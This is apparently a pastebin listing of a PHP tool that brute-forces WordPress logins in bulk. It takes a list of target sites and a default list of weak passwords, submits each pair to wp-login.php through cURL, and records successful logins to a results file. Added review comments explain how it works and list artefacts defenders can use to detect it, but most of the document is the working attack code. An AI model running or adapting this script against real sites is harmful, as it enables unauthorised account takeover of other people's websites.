Magrisya

WPBF

Jul 5th, 2018
  1. <?
  2. # Wordpress Mass brute Force Priv8 ^_*
  3. # Coded by Lagrip-dz
  4. # Devloped by Th3 K!LL3r Dz
  5. # Style Leacked By Th3 K!LL3r Dz
  6. # copyright to sec4ever.com
  7. # special Greet'z to : n4ssim , Damane2011
  8. # Greet'z to : all sec4ver members
  // Emits the whole operator-facing page in one echo: inline CSS plus a single POST form.
  // The form posts back to the same URL (action="") with these fields:
  //   usr   - username to try, pre-filled with "admin"
  //   sites - list of target sites, one per line
  //   w0rds - password list, pre-filled with eleven common weak passwords
  //   x     - the submit button; its presence starts the run further down
  // The favicon and background images are loaded from third-party hosts
  // (dz48-coders.org, i41/i43.tinypic.com), so merely opening the page causes outbound requests.
  // NOTE(review): an unexpected PHP file in a web root that renders this form suggests the
  // host is being used to stage password guessing against other sites - confirm against file
  // ownership and upload timestamps.
  9. echo '<html>
  10. <head>
  11. <link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
  12. <meta name="author" content="Th3 K!LL3r Dz" />
  13. <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
  14. <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
  15. <title># Wordpress Mass brute Force #</title>
  16. <style type=\'text/css\'>
  17. input[type=submit], input[type=button], input[type=reset]{
  18. text-align:center;
  19. background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  20. border:1px solid #4D4D4D;
  21. color:#FFFFFF;
  22. border-top-color:#565656;
  23. padding:4px 6px;
  24. margin:4px 5px;
  25. height:16px;
  26. -moz-box-shadow:0 0 1px black;
  27. -webkit-box-shadow:0 0 1px black;
  28. box-shadow:0 0 1px black;
  29. text-shadow:0 1px black;
  30. -moz-border-radius:4px;
  31. -webkit-border-radius:4px;
  32. -khtml-border-radius:4px;
  33. border-radius:4px;
  34. height:23px;
  35. }
  36.  
  37.  
  38. input[type=text], input[type=password]{
  39. background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  40. border:1px solid #4D4D4D;
  41. color:#CCCCCC;
  42. border-top-color:#565656;
  43. -moz-box-shadow:0 0 1px black;
  44. -webkit-box-shadow:0 0 1px black;
  45. box-shadow:0 0 1px black;
  46. -moz-border-radius:4px;
  47. -webkit-border-radius:4px;
  48. -khtml-border-radius:4px;
  49. border-radius:4px;
  50. height:18px;
  51. margin-left: 5px;
  52. }
  53. input , textarea , button , body , caption , table ,area , option {
  54. outline:none;
  55. transition: all 0.20s ease-in-out;
  56. -webkit-transition: all 0.25s ease-in-out;
  57. -moz-transition: all 0.25s ease-in-out;
  58. border-radius:3px;
  59. -webkit-border-radius:3px;
  60. -moz-border-radius:3px;
  61. //border:1px solid rgba(0,0,0, 0.2);
  62. /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
  63. }
  64. input , textarea {
  65. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  66. }
  67.  
  68. input , textarea {
  69. outline:none;
  70. transition: all 0.20s ease-in-out;
  71. -webkit-transition: all 0.25s ease-in-out;
  72. -moz-transition: all 0.25s ease-in-out;
  73. border-radius:3px;
  74. -webkit-border-radius:3px;
  75. -moz-border-radius:3px;
  76. border:1px solid rgba(0,0,0, 0.2);
  77. }
  78. input:focus, textarea:focus {
  79. outline: 0;
  80. border-color: rgba(82, 168, 236, 0.8);
  81. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  82. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  83. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  84.  
  85.  
  86. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
  87. overflow: auto;
  88.  
  89. }
  90. .x1 {}
  91. .x2 {font-size:13px;
  92. background-color:green;
  93. color:black;}
  94. hr {color:white;}
  95. a {color:black;}
  96. #x5 {
  97. font-family:tahoma;}
  98. .d1 {color :#C17E0B;
  99. font-family:tahoma;
  100. font-size:13px;
  101. font-weight:bold;}
  102. #d4 {color:#C17E0B;
  103. font-family:tahoma;
  104. font-weight:bold;}
  105. </style>
  106. </head>
  107. </br></br>
  108. <center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
  109. <form method="post" action="" enctype="multipart/form-data">
  110. <table width="50%" border="0">
  111. <tr><td><p ><font class="d1">User :</font>
  112. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
  113. </td></tr>
  114. <tr><td><font class="d1">Sites list :</font>
  115. </td><td><font class="d1" >Pass list :</font></td></tr>
  116. <tr><td>
  117. <textarea name="sites" cols="40" rows="13" ></textarea>
  118. </td><td>
  119. <textarea name="w0rds" cols="20" rows="13" >
  120. admin
  121. 123456
  122. password
  123. 102030
  124. 123123
  125. 12345
  126. 123456789
  127. pass
  128. test
  129. admin123
  130. demo
  131. </textarea>
  132. </td></tr><tr><td>
  133. <font >
  134. <input type="submit" name="x" value="start" id="d4">
  135. </font></td></tr></table>
  136. </form></center>';
  // Lifts PHP's execution time limit; the @ hides the warning if the host forbids the call.
  137. @set_time_limit(0);
  138.  
  139.  
  // Runs only when the form's submit field "x" is present. Nothing visible here authenticates
  // the caller, so whoever can reach the script over HTTP can trigger a run.
  // Both textareas are split on "\n". The outer loop walks the passwords and the inner loop
  // walks the sites, so every site gets one attempt per password before the next password
  // starts. $_POST['usr'] is passed through unchanged; site and password entries go through txt_cln().
  // NOTE(review): because attempts against any one site are interleaved with the other sites,
  // per-site rate thresholds may see them spread out; correlating failed wp-login.php attempts
  // by source address and User-Agent, or counting cumulative failures per account, is likely
  // to be more reliable - confirm against real logs.
  140. if($_POST['x']){
  141.  
  142. echo "<hr>";
  143.  
  144. $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
  145. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
  146.  
  147. $Attack = new Wordpress_brute_Force(); // Active Class
  148.  
  149.  
  150. foreach($w0rds as $pwd){
  151.  
  152. foreach($sites as $site){
  153.  
  154.  
  155. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
  // Pushes each result line to the browser as it is produced.
  156. flush();flush();
  157.  
  158. }
  159.  
  160. }
  161.  
  162. }
  163.  
  164.  
  165. # Class & Function'z
  166.  
  // txt_cln(): returns $value with every "\n" and "\r" removed.
  // The caller splits the submitted lists on "\n" only, so this removes any "\r" left on an
  // entry (presumably from CRLF line endings in the textarea data).
  167. function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
  168.  
  // Wordpress_brute_Force: four methods that submit one username/password pair to a site's
  // wp-login.php through cURL and report the outcome. The class holds no properties.
  //
  // Artefacts visible in this listing that help detection and incident response:
  //   - POST requests to <site>/wp-login.php carrying the fixed Firefox/3.0.4 User-Agent
  //     string set below, with fields log, pwd, rememberme=forever and testcookie=1;
  //   - the POST body is passed to cURL as a PHP array, which PHP's cURL binding encodes as
  //     multipart/form-data, whereas browsers submit the standard login form as
  //     application/x-www-form-urlencoded;
  //   - "cookie.txt" and "Wp-Result.txt" are written through relative paths, so they appear
  //     in the process's working directory. Any credentials recorded in Wp-Result.txt
  //     should be treated as compromised and rotated.
  // Login throttling or lockout, multi-factor authentication, and not using passwords like
  // those in the form's default list limit what this kind of guessing can achieve.
  169. class Wordpress_brute_Force{
  170.  
  // check_it(): runs one attempt through post() and reports it.
  // A response body containing "profile.php" (case-insensitive match via eregi) is counted as
  // a successful login: the pair is echoed with a link to <site>/wp-admin/ and appended to
  // Wp-Result.txt (opened in "a+" mode, so the file is created if missing). Any other result,
  // including a failed transfer, is echoed as "Failed".
  // $site, $user and $pass are interpolated into the HTML output without escaping.
  // NOTE(review): eregi() was removed in PHP 7.0, so this method only runs on PHP 5.x hosts.
  171. public function check_it($site,$user,$pass){ // print result
  172.  
  173. if(eregi('profile.php',$this->post($site,$user,$pass))){
  174. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
  175. $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
  176. flush();
  177. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
  178.  
  179. }
  180.  
  // post(): sends the login form for one credential pair to <site>/wp-login.php and returns
  // whatever curl_exec() returns (the response body, or false when the transfer fails).
  // Redirects are followed, cookies are read from and saved to cookie.txt, and the transfer
  // is capped at 20 seconds. redirect_to points at <site>/wp-admin.
  // NOTE(review): $token is fetched but never added to $data, and 'wp-submit' is set to an
  // array of two button labels ('Log In' and an Arabic label) instead of a single string.
  181. public function post($site,$user,$pass){ // Post -> user & pass
  182. $login =$site.'/wp-login.php';
  183. $to = $site.'/wp-admin';
  184. $token = $this->extract_token($site);
  185. $log = array ('Log In','دخول');
  186. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
  187.  
  188. $curl=curl_init();
  189.  
  190. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  191. curl_setopt($curl,CURLOPT_URL,$login);
  192. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  193. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  194. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  195. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  196. curl_setopt($curl,CURLOPT_POST,1);
  197. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
  198. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  199.  
  200. $exec=curl_exec($curl);
  201. curl_close($curl);
  202. return $exec;
  203.  
  204. }
  205.  
  // extract_token(): searches the page returned by get_source() for a hidden input whose name
  // is 32 hex characters and whose value is "1", and returns the first such name.
  // When nothing matches, $token[1][0] does not exist, so the result is null and PHP emits a
  // notice or warning.
  206. public function extract_token($site){ // get token from source for -> function post
  207.  
  208. $source = $this->get_source($site);
  209.  
  210. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
  211.  
  212. return $token[1][0];
  213.  
  214. }
  215.  
  // get_source(): performs a cURL request with the same User-Agent, cookie file, redirect and
  // timeout settings as post(), without POST data, and returns curl_exec()'s result.
  // NOTE(review): CURLOPT_URL is taken from $login, which is not assigned in this method, and
  // the $site argument is not used, so it is not clear from this listing that any request
  // reaches the target here. Do not assume a GET precedes each login POST in server logs.
  216. public function get_source($site){ // get source for -> function extract_token
  217.  
  218. $curl=curl_init();
  219. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  220. curl_setopt($curl,CURLOPT_URL,$login);
  221. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  222. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  223. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  224. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  225. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  226.  
  227. $exec=curl_exec($curl);
  228. curl_close($curl);
  229. return $exec;
  230.  
  231. }
  232.  
  233. }
  234. ?>